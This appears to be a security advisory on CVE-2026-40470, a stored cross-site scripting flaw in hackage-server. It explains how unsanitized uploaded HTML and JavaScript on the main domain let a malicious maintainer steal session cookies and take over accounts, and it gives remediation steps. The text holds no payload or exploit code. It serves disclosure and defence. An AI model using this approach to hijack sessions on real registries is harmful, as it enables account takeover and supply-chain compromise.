Hackage XSS hijacks user sessions (CVE-2026-40470)

Patch now - CVE-2026-40470 is a critical session hijacking vulnerability in hackage-server prior to version 2.1.1 that lets a malicious package maintainer execute arbitrary JavaScript against any authenticated user viewing a compromised package page, allowing full account takeover. Upgrade immediately to the latest patched version to prevent exploitation.

Overview

A critical stored cross-site scripting (XSS) vulnerability in hackage-server and hackage.haskell.org (CVE-2026-40470) allows malicious package maintainers to execute arbitrary JavaScript in the browser of any authenticated user who views their package page or documentation. The vulnerability enables full session hijacking against users with latent HTTP credentials.

Technical Details

The flaw exists because hackage-server serves HTML and JavaScript files from uploaded source packages and documentation exactly as provided, without sanitization or Content Security Policy headers. Since these resources are served on the main hackage.haskell.org domain, they have full access to the browser’s session context. When an authenticated user visits a compromised package page, the attacker’s script can read and exfiltrate session cookies, then use those credentials to perform any action the victim user is authorized to do.

Impact

An attacker can:

• Upload arbitrary packages or documentation under the victim’s identity
• Modify package metadata, including maintainer lists
• Amend or delete package ownership
• Perform any action the victim’s account permits

Because the attack requires no user interaction beyond browsing a package page, and the attacker need only low-level privileges (a valid maintainer account to upload malicious content), the CVSS score is 9.9 (Critical).

Affected Versions

All versions of hackage-server prior to the patch. The hackage.haskell.org production instance is also affected.

Remediation

1. Update hackage-server to the latest patched version that sanitizes uploaded HTML and JavaScript content and implements proper Content Security Policy headers.
2. Audit existing packages for potentially malicious uploaded content that may have been deployed before the fix.
3. Enable multi-factor authentication (MFA) on all maintainer accounts to limit session hijacking impact.
4. Monitor server access logs for unusual session activity during the exposure window.

Workaround

If immediate patching is not possible, temporarily disable the documentation upload facility and restrict package uploads to trusted maintainers only.

Security Insight

This vulnerability mirrors the classic “trusted domain” XSS pattern seen in many package repositories (e.g., PyPI’s 2022 content injection incidents). It underscores that package registries must treat every uploaded file as potentially malicious content, even when it arrives through legitimate maintainer channels. The high CVSS score reflects how deeply trust assumptions in software supply chains can be exploited when content origin is confused with content safety. For more on supply-chain attack trends, see our security news.

Further Reading

• All Critical Vulnerabilities
• Recent Critical Vulnerabilities
• Top Critical CVEs